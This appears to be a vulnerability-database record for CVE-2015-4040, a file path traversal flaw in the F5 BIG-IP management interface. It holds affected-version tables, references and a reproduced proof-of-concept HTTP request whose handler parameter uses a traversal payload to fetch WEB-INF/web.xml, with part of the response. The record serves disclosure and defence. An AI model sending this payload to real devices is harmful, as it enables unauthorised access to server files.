| vendor: | f5 | model: | big-ip afm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.4.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | ne | version: | 12.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip aam | scope: | ne | version: | 12.0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040
]
# Multiple Additional F5 products & versions are Affected and documented
here:
https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When
we submit a payload
*/tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler*
parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://
<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F;
BIGIPAuthUsernameCookie=admin;
BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5;
F5_CURRENT_PARTITION=Common;
f5formpage="/tmui/locallb/virtual_server/list.jsp?&";
f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp";
f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""
_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
*...[SNIP]...*
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=
*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*
*Web.xml is returned in the Response:*
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
*<!--Automatically created by Tomcat JspC.--><web-app>*
*...[config file output redacted here]...*
*.....*
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
Karn Ganeshen
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2015-4040 | Trust: 3.0 |
| db: | EXPLOIT-DB | id: | 38448 | Trust: 1.6 |
| db: | EDBNET | id: | 81592 | Trust: 0.6 |
| db: | EDBNET | id: | 59547 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 133931 | Trust: 0.5 |
| db: | BID | id: | 77076 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-4040 | Trust: 2.1 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/38448/ | Trust: 0.6 |
| url: | https://f5.com/ | Trust: 0.3 |
| url: | https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 77076 |
| db: | PACKETSTORM | id: | 133931 |
| db: | EXPLOIT-DB | id: | 38448 |
| db: | EDBNET | id: | 81592 |
| db: | EDBNET | id: | 59547 |
LAST UPDATE DATE
2022-07-27T09:15:27.148000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 77076 | date: | 2015-09-09T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 77076 | date: | 2015-09-09T00:00:00 |
| db: | PACKETSTORM | id: | 133931 | date: | 2015-10-12T17:02:22 |
| db: | EXPLOIT-DB | id: | 38448 | date: | 2015-10-13T00:00:00 |
| db: | EDBNET | id: | 81592 | date: | 2015-10-13T00:00:00 |
| db: | EDBNET | id: | 59547 | date: | 2015-10-13T00:00:00 |